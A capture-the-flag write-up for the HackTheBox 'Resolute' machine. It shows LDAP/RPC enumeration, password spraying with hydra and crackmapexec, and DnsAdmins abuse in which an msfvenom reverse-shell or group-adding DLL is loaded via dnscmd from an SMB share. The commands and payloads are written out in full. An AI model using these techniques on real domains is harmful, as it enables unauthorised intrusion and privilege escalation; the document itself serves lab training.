[hw] hackerswar
~ p / resolute-hackthebox-writeup
search ⌘K
dark
// browse
~index /search
// sections
λ AI Security 0 $_ CTF Writeups 7 ** Dispatches 0 ## Exam Reviews 1 >> Pentesting 1 -> Tutorials 0
// meta
iabout

RESOLUTE HACKTHEBOX - WRITEUP

KK Kunal | Aug 10, 2023 | 5 min | Beginner | CTF Writeups

This is the Write-up/Walkthrough of the RESOLUTE Machine from Hackthebox.

NMAP SCAN:

text 
88/tcp   open  kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-09 13:09:28Z)
135/tcp  open  msrpc        syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open               syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?    syn-ack
593/tcp  open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped   syn-ack
3268/tcp open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped   syn-ack

Domain found: megabank.local, BIOS Name: Resolute

No file shares were found on smb, after I used ldapsearch to find more info about the domain, redirected the output to the file, and extracted all users.

text 
ldapsearch -H ldap://10.10.10.169  -D '' -w '' -b "DC=megabank,DC=local" > ldap_search
cat ldap_search | grep sAMAccountName | awk '{print $2}' > users.txt
#remove extra groups name first word

after that used rpcclient, to enumerate more about the domain and by querying “querydispinfo”, found a password set for marko account, “Welcome123!”, then will use this password to brute the users account that I found.

text 
rpcclient -U "" -N 10.10.10.169
pcclient $> querydispinfo

after that used, hydra to brute-force the users with that password, and found a valid password of smb for Melanie user.

text 
hydra -L users.txt -p 'Welcome123!' smb://10.10.10.169

And, username and password of winrm service is also the same, I brute-forced it using crackmapexec

text 
crackmapexec winrm 10.10.10.169 -u users.txt -p 'Welcome123!'

Login to using evil-winrm and got the user flag.

after enumerating find the hidden directory in C:\ named PSTransscripts, going deeper into this directory found a file that contains PowerShell Transcript, reading the file and found the password of Ryan user.

after connecting to ryan user using evil-winrm, found that the group is in the Contractors group and this group is a member of DnsAdmins, looking for DnsAdmins abuse on the Internet found a way, from which I can inject a vulnerable payload using dnscmd and stop and start the service to get the reverse shell.

Ryan is a member of Contractors’ group

and Checking for localgroup members, found there is a DnsAdmins group, checking for its member, found that the Contractors group is a member of this group, and ryan is in this group.

I followed this blog to get the Administrator account/DA, read the blog for more info.

I will show two methods for getting an Administrator account, first one is getting the shell directory, and second one is modifying the user account or changing the administrator password directory.

Note: In a real-world environment, it is not suggested to change the credentials of any users.

Method 1:

Generating malicious dll using msfvenom to get the reverse shell.

text 
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.48 LPORT=1337 -f dll -o h311.dll

after that, open smbserver where generate dll is present, using impacket.

text 
impacket-smbserver smb2support share .

On ryan machine, using dnscmd to load generated malicious dll

text 
dnscmd /config /serverlevelplugindll \\YOUR-TUNNEL-IP\share\h311.dll

Start Metasploit listener:

text 
msfconsole -q
msf6> use multi/handler
msf6> set payload windows/x64/meterpreter/reverse_tcp
msf6> set lhost tun0
msf6> set lport 1337
msf6> run
#now wait for the connection

after that stop the dns service and start again, make sure to you started the Metasploit listener.

text 
sc.exe stop dns
sc.exe start dns

Method 2:

Generating payload with msfvenom but assigning the command in it directly:

text 
msfvenom -p windows/x64/exec cmd='net localgroup Administrators ryan /add /domain' -f dll -o h311_add.dll

after that, open smbserver where generate dll is present, using impacket.

text 
impacket-smbserver smb2support share .

On ryan machine, using dnscmd to load generated malicious dll

text 
dnscmd /config /serverlevelplugindll \\YOUR-TUNNEL-IP\share\h311.dll

after that stop the dns service and start again, make sure you started the metasploit listener.

text 
sc.exe stop dns
sc.exe start dns

now, I can check, ryan is on the Administrators group.

but, in this lab, there is note.txt in ryan Desktop, saying any changes to the administrator account reverted back within 1 minute, there are also many methods to get an administrator account using these methods, try some methods on your own.

Related

CTF Writeups
RETRO2 – VULNLAB WRITEUP
Dec 23, 2024 · 7 min
CTF Writeups
HYBRID VULNLAB - WRITEUP
Aug 17, 2023 · 12 min

Contents

blog.hackerswar.com 9 posts indexed
rendered 4.1ms